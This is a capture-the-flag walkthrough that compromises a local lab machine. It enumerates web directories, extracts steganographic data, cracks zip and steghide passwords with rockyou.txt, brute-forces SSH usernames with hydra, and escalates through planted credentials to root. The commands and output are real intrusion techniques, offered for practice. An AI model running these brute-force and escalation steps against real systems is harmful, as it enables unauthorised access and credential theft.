HereBash

export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Web Server Enumeration

gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt

/scripts (Status: 301) [Size: 310] [--> http://$TARGET_IP/scripts/]

Investigating `/scripts/` Directory

Further investigation of the /scripts/ directory revealed two elements:

put.php: A PHP file.
upload/: An empty directory.

Accessing http://$TARGET_IP/scripts/put.php directly via a web browser resulted in a 405 (Method Not Allowed) error. This is because the browser, by default, sends a GET request, and the file likely expects a different HTTP method.

The name put.php strongly suggests that this file might be designed to handle HTTP PUT requests.
The presence of an empty upload/ directory further reinforces the hypothesis that this setup could be intended for file uploads.

Confirm PUT Request Handling

curl -X PUT http://$TARGET_IP/scripts/put.php

Results

spongebob

spongebob could be a username but also something else... Like a directory name!

http://172.17.0.2/spongebob/upload has a JPG image. Maybe we have to make some Steganography?

Confirm PUT Request Handling

curl -X PUT http://$TARGET_IP/scripts/put.php

Results

spongebob

The response "spongebob" is ambiguous. It could represent a username, a directory name, or another resource identifier. Further investigation is warranted.

Exploring Potential "spongebob" Resource

Based on the response, we hypothesize that "spongebob" might represent a directory or endpoint. We can test this by directly accessing it via the web server.

Visiting http://$TARGET_IP/spongebob/ in a web browser reveals a directory listing.

Contents of /spongebob/

upload/: A subdirectory containing a single image file, ohnorecallwin.jpg.

The presence of an image file raises the possibility of steganography or other data-hiding techniques being employed.

Analyzing `ohnorecallwin.jpg`

We begin by downloading the ohnorecallwin.jpg file for analysis.

wget http://$TARGET_IP/spongebob/upload/ohnorecallwin.jpg

Extracting Hidden Data with Steghide

We use steghide to attempt data extraction. Since we don't have an initial password, we will iterate through a password list:

#!/bin/bash

while IFS= read -r password; do
  # Suppress error messages by redirecting stderr to /dev/null
  if steghide extract -sf ohnorecallwin.jpg -p "$password" 2>/dev/null; then
    echo "Success with password: $password"
    steghide extract -sf ohnorecallwin.jpg -p "$password" # Display output after success
    break # Exit the loop after successful extraction
  fi
done < /usr/share/wordlists/rockyou.txt

This script efficiently tries passwords from rockyou.txt. The output reveals the correct password:

Success with password: spongebob
wrote extracted data to "seguro.zip".

Unzipping seguro.zip

The extracted seguro.zip archive is password-protected. We employ fcrackzip with rockyou.txt for a dictionary attack:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt seguro.zip

This yields the password for seguro.zip:

PASSWORD FOUND!!!!: pw == chocolate

We then unzip the archive:

unzip seguro.zip
Archive:  seguro.zip
[seguro.zip] secreto.txt password: 
  inflating: secreto.txt 

Extracting the Hidden Message

The contents of secreto.txt are:

cat secreto.txt
aprendemos

The extracted message "aprendemos" is likely a credential or part of a credential, possibly a password or keyword.

SSH Username Enumeration and Exploitation

Given that port 22 (SSH) is open and we have a potential password ("aprendemos"), we attempt to enumerate valid SSH usernames using hydra.

Wordlist Selection:

For username enumeration, specialized wordlists are more effective than general password lists like rockyou.txt. The seclists project (https://github.com/danielmiessler/SecLists) offers a comprehensive collection of username lists under the Usernames directory. In this case, we will use xato-net-10-million-usernames.txt which could be found in SecLists.

Hydra Command for Username Enumeration:

hydra -L ~/Downloads/xato-net-10-million-usernames.txt -p aprendemos ssh://172.17.0.2 -f

Results:

[22][ssh] host: 172.17.0.2   login: rosa   password: aprendemos

SSH Access and Initial Foothold

Using the discovered credentials, we establish an SSH connection:

ssh rosa@$TARGET_IP

Exploring Rosa's Home Directory:

Upon successful login, we navigate to an unusual directory:

cd ./-

Listing the directory contents reveals numerous files and directories following a pattern:

ls
buscaelpass1   buscaelpass14  buscaelpass19  buscaelpass23  buscaelpass28  buscaelpass32  buscaelpass37  buscaelpass41  buscaelpass46  buscaelpass50  buscaelpass55  buscaelpass6   buscaelpass64  buscaelpass8
buscaelpass10  buscaelpass15  buscaelpass2   buscaelpass24  buscaelpass29  buscaelpass33  buscaelpass38  buscaelpass42  buscaelpass47  buscaelpass51  buscaelpass56  buscaelpass60  buscaelpass65  buscaelpass9
buscaelpass11  buscaelpass16  buscaelpass20  buscaelpass25  buscaelpass3   buscaelpass34  buscaelpass39  buscaelpass43  buscaelpass48  buscaelpass52  buscaelpass57  buscaelpass61  buscaelpass66  creararch.sh
buscaelpass12  buscaelpass17  buscaelpass21  buscaelpass26  buscaelpass30  buscaelpass35  buscaelpass4   buscaelpass44  buscaelpass49  buscaelpass53  buscaelpass58  buscaelpass62  buscaelpass67
buscaelpass13  buscaelpass18  buscaelpass22  buscaelpass27  buscaelpass31  buscaelpass36  buscaelpass40  buscaelpass45  buscaelpass5   buscaelpass54  buscaelpass59  buscaelpass63  buscaelpass7

We also find a script named creararch.sh.

Analyzing creararch.sh:

cat creararch.sh

The script's contents are:

#!/bin/bash

# Buscamos directorios que empiezan con "busca"
for directorio in busca*; do
        # Comprobamos si el directorio existe
        if [ -d "$directorio" ]; then
                # Crearmos 50 archivos y les metemos el contenido xx
                for i in {1..50}; do
                        touch "$directorio/archivo$i" && echo "xxxxxx:xxxxxx" > "$directorio/archivo$i"
                done
                echo "Se crearon 50 archivos en $directorio"
        else
                echo "El directorio $directorio no existe"
        fi
done

This script creates 50 files within each directory starting with "busca" and fills them with the string "xxxxxx:xxxxxx".

Identifying Files with Anomalous Content

We can infer that one of these files might contain credentials or valuable information. We devise a script to identify files that deviate from the standard 14-byte size established by creararch.sh (or we could just filter out "xxxxxx:xxxxxx" using grep):

#!/bin/bash

# Loop through all "buscaelpass" directories
for dir in buscaelpass*; do
  # Loop through all files in each directory
  for file in "$dir"/*; do
    # Get the size of the file
    size=$(stat -c %s "$file")

    # Check if the size is different from 14 bytes
    if [[ "$size" != "14" ]]; then
      echo "Found file with different size: $file"
      # Optionally, display the file content:
      cat "$file" 
    fi
  done
done

Found file with different size: buscaelpass33/archivo21
pedro:ell0c0

Privilege Escalation: `pedro`

su pedro

In pedro's home directory, we found another directory named .... Inside that we found a file called .misecreto.

cd .../
cat .misecreto
> Consegui el pass de juan y lo tengo escondido en algun lugar del sistema fuera de mi home.

Locating Juan's Password:

We search for files owned by pedro outside his home directory, excluding the /proc filesystem:

find / -type f -user pedro 2>/dev/null | grep -v "proc"

This command reveals several files, including a particularly interesting one:

/home/pedro/.../.misecreto
/home/pedro/.bashrc
/home/pedro/.bash_logout
/home/pedro/.profile
/home/pedro/.cache/motd.legal-displayed
/var/mail/.pass_juan

We examine the contents of /var/mail/.pass_juan:

cat /var/mail/.pass_juan
ZWxwcmVzaW9uZXMK

The content "ZWxwcmVzaW9uZXMK" seems to be Base64 encoded. Actually we do not need to decode it.

su juan

Privilege Escalation: `juan`

We find an interesting file named .ordenes_nuevas in juan's home directory:

cat .ordenes_nuevas
> Hola soy tu patron y me canse y me fui a casa te dejo mi pass en un lugar a mano consiguelo y acaba el trabajo.

This message suggests that juan's boss has left his password somewhere easily accessible.

We inspect juan's .bashrc file.

nano .bashrc

The file reveals an unusual alias:

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias pass='eljefe'
alias l='ls -CF'

The alias pass='eljefe' is highly suspicious, suggesting that "eljefe" might be a password.

Privilege Escalation: `root`

We attempt to use the discovered password to escalate to root:

su root
Password: eljefe

The password "eljefe" is accepted, granting us root privileges:

id
uid=0(root) gid=0(root) groups=0(root)

Web Server Enumeration​

Investigating /scripts/ Directory​

Exploring Potential "spongebob" Resource​

Analyzing ohnorecallwin.jpg​

SSH Username Enumeration and Exploitation​

SSH Access and Initial Foothold​

Identifying Files with Anomalous Content​

Privilege Escalation: pedro​

Privilege Escalation: juan​

Privilege Escalation: root​